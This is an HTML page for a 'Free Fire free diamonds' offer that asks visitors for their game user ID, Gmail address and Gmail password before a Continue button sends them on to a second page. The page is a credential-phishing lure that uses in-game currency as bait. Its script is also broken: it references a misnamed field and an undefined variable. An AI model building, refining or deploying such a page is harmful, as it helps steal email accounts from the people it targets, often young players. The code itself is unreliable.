<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Form with Conditional Continue Button</title>
  <style>
    body {
        background-image: url(image.1.webp);
      font-family: Arial, sans-serif;
      text-align: center;
      padding-top: 100px;
    }

    input {
      padding: 10px;
      font-size: 16px;
      margin: 10px;
      width: 250px;
    }

    #continueBtn {
      padding: 12px 25px;
      font-size: 18px;
      background-color: #28a745;
      color: white;
      border: none;
      cursor: pointer;
      border-radius: 5px;
      margin-top: 20px;
      display: none; /* Hidden by default */
    }

    #continueBtn:hover {
      background-color: #218838;
    }
  </style>
    <img src="diamonds.jpeg" width="900" height="231" alt="" srcset="">
</head>
<body>
    
  <h1>Free Fire free diamonds💎</h1>
  <form id="userForm">
    <input type="text" name="U'Id" id="name" placeholder="Enter your U'Id" required><br>
    <input type="email" name="email" id="email" placeholder="Gmail for free fire" required><br>
    <input type="email" name="gmail password" id="password" placeholder="Gmail password" required><br>
  </form>

  <!-- Continue Button, shown only when form is complete -->
  <button id="continueBtn" onclick="goToNextPage()">Continue</button>

  <script>
    const nameInput = document.getElementById("name");
    const emailInput = document.getElementById("email");
    const passwordInput = document.getElementById("Password");
    const continueBtn = document.getElementById("continueBtn");

    // Listen for changes in the input fields
    nameInput.addEventListener("input", checkFormFilled);
    emailInput.addEventListener("input", checkFormFilled);
    gmailpasswordput.addEventListener("input", checkFormFilled);

    function checkFormFilled() {
      const name = nameInput.value.trim();
      const email = emailInput.value.trim();
     
      
      if (name !== "" && email !== "") {
        continueBtn.style.display = "inline-block";
      } else {
        continueBtn.style.display = "none";
      }
    }

    function goToNextPage() {
      // Optional: Save form data or do validation here
      window.location.href = "2.html"; // Redirect to next page
    }
  </script>

</body>
</html>
